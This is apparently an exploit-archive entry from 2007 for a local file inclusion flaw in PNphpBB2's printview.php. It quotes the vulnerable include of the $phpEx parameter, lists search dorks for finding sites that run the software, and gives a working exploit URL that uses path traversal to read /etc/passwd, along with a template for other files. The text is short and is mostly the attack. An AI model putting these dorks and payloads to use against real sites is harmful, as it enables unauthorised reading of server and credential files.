PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln

2007-12-26 00:00:00

.-----------------------------------------------------------------------------.
| vuln.: PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln. |
| download: http://www.pnphpbb.com/ |
| dorks: Powered by PNphpBB2 / Powered por PNphpBB2 |
| inurl:"index.php?name=PNphpBB2" |
| |
| author: [email protected] |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: str0ke, wacky, polish under ;] |
'-----------------------------------------------------------------------------'

# code:

/printview.php:
...
define('IN_PHPBB', true);
$ModName = basename( dirname( __FILE__ ) );
$phpbb_root_path = './modules/' . $ModName . '/';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
...

LFI in $phpEx :D:D:D

# sploit:

http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd
http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=[ LFI ]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.